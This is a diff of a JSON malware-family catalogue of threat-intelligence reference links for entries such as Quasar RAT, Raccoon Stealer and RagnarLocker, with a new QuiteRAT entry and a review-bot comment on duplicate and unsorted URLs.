 "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
- "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://asec.ahnlab.com/en/31089/",
- "https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
 "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
- "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time",
- "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
- "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
- "https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/",
- "https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
- "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
- "https://twitter.com/malwrhunterteam/status/789153556255342596",
- "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
- "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage",
- "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
- "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
- "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html",
- "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://www.antiy.cn/research/notice&report/research_report/20201228.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://therecord.media/chinese-hackers-linked-to-months-long-attack-on-taiwanese-financial-sector/",
- "https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf",
- "https://blog.minerva-labs.com/trapping-quasar-rat",
 "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/",
- "https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/",
- "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass",
- "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques",
- "https://blog.malwarelab.pl/posts/venom/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ",
- "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments",
+ "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
 "https://medium.com/cycraft/china-implicated-in-prolonged-supply-chain-attack-targeting-taiwan-financial-sector-264b6a1c3525",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments",
+ "https://blog.malwarelab.pl/posts/venom/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
+ "https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://www.antiy.cn/research/notice&report/research_report/20201228.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf",
+ "https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/",
+ "https://blog.minerva-labs.com/trapping-quasar-rat",
+ "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://twitter.com/malwrhunterteam/status/789153556255342596",
+ "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
 "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques",
+ "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass",
+ "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://embee-research.ghost.io/hunting-quasar-rat-shodan",
+ "https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
 "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
+ "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html",
+ "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
+ "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4",
+ "https://therecord.media/chinese-hackers-linked-to-months-long-attack-on-taiwanese-financial-sector/",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
+ "https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://embee-research.ghost.io/shodan-censys-queries/",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
+ "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
+ "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848",
+ "https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/",
+ "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
+ "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://twitter.com/struppigel/status/1130455143504318466",
+ "https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/",
+ "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
+ "https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934",
+ "https://asec.ahnlab.com/en/31089/",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/"
 ],
 "synonyms": [
 "CinaRAT",
@@ -39732,8 +41602,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickheal",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
- "https://medium.com/insomniacs/quarians-turians-and-quickheal-670b24523b42"
+ "https://medium.com/insomniacs/quarians-turians-and-quickheal-670b24523b42",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -39759,8 +41629,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.quietcanary",
- "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
- "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity"
+ "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
 ],
 "synonyms": [
 "Kapushka",
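Review bot: The regenerated Quasar RAT refs on the new side still carry a near-duplicate pair, `https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?` and the same URL without the trailing `?`, plus the truncated `https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-`. These look inherited from the upstream data rather than introduced here, so normalising URLs in whatever regenerates this cluster (stripping an empty query string and dropping an entry that ends in a dangling path segment) would stop them reappearing on every sync. The same refs are also emitted in a different order from the previous version, so an 85-line old span becomes a 103-line new one for what is mostly a reshuffle; sorting the list deterministically would leave only the QUARTERRIG entry and the genuinely new refs visible in the diff. The reorder pattern repeats in the QuantLoader, QuickHeal, QuietCanary, Raccoon and Racket hunks.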
@@ -39784,6 +41654,24 @@
 "uuid": "49aa0a57-812c-4344-9315-cd8c3220198e",
 "value": "QuietSieve"
 },
+ {
+ "description": "QuiteRAT is a simple remote access trojan written with the help of Qt libraries.\r\n\r\nAfter sending preliminary system information to its C&C server, it expects a response containing either a supported command code or an actual Windows command (like systeminfo or ipconfig with parameters) to execute.\r\n\r\nIt was deployed in a campaign exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quiterat",
+ "https://blog.talosintelligence.com/lazarus-quiterat/",
+ "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966",
+ "https://asec.ahnlab.com/ko/56256/",
+ "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf"
+ ],
+ "synonyms": [
+ "Acres"
+ ],
+ "type": []
+ },
+ "uuid": "03409fbe-c8ac-41f9-a89b-38dd9f7ef63d",
+ "value": "QuiteRAT"
+ },
 {
 "description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines.\r\n",
 "meta": {
@@ -39846,60 +41734,63 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon",
- "https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
+ "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8",
+ "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
+ "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949",
 "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/",
 "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/",
 "https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/",
- "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
- "https://d01a.github.io/raccoon-stealer/",
- "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
- "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8",
- "https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram",
- "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
- "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html",
- "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
- "https://asec.ahnlab.com/ko/25837/",
- "https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/",
- "https://asec.ahnlab.com/en/35981/",
- "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf",
- "https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/",
- "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
- "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
- "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
- "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/",
- "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer",
- "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block",
- "https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view",
- "https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/",
- "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949",
- "https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/",
- "https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation",
- "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/",
- "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/",
- "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/",
- "https://www.group-ib.com/blog/fakesecurity_raccoon",
 "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon",
- "https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram",
 "https://www.riskiq.com/blog/labs/magecart-medialand/",
- "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/",
+ "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
 "https://www.youtube.com/watch?v=5KHZSmBeMps",
- "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf",
+ "https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/",
+ "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://cyberint.com/blog/financial-services/raccoon-stealer/",
+ "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
+ "https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation",
+ "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
 "https://www.youtube.com/watch?v=1dbepxN2YD8",
- "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family"
+ "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon",
+ "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
+ "https://www.secureworks.com/research/the-growing-threat-from-infostealers",
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d",
+ "https://www.group-ib.com/blog/fakesecurity_raccoon",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer",
+ "https://d01a.github.io/raccoon-stealer/",
+ "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
+ "https://www.youtube.com/watch?v=kfl_2_NBVGc",
+ "https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/",
+ "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/",
+ "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block",
+ "https://asec.ahnlab.com/en/35981/",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf",
+ "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/",
+ "https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view",
+ "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf",
+ "https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/",
+ "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/",
+ "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
+ "https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/",
+ "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/"
 ],
 "synonyms": [
 "Mohazo",
@@ -39917,8 +41808,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket",
- "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
- "https://medium.com/s2wlab/analysis-of-lazarus-malware-abusing-non-activex-module-in-south-korea-7d52b9539c12"
+ "https://medium.com/s2wlab/analysis-of-lazarus-malware-abusing-non-activex-module-in-south-korea-7d52b9539c12",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/"
 ],
 "synonyms": [],
 "type": []
@@ -39969,52 +41861,52 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/", - "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf", - "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", - "https://www.acronis.com/en-sg/articles/ragnar-locker/", - "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/", - "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", - "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://twitter.com/AltShiftPrtScn/status/1403707430765273095", - "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/", - "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", - 
"https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", - "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information", - "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", - "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", - "http://reversing.fun/posts/2021/04/15/unpacking_ragnarlocker_via_emulation.html", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", - "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", - "https://www.ic3.gov/Media/News/2022/220307.pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - 
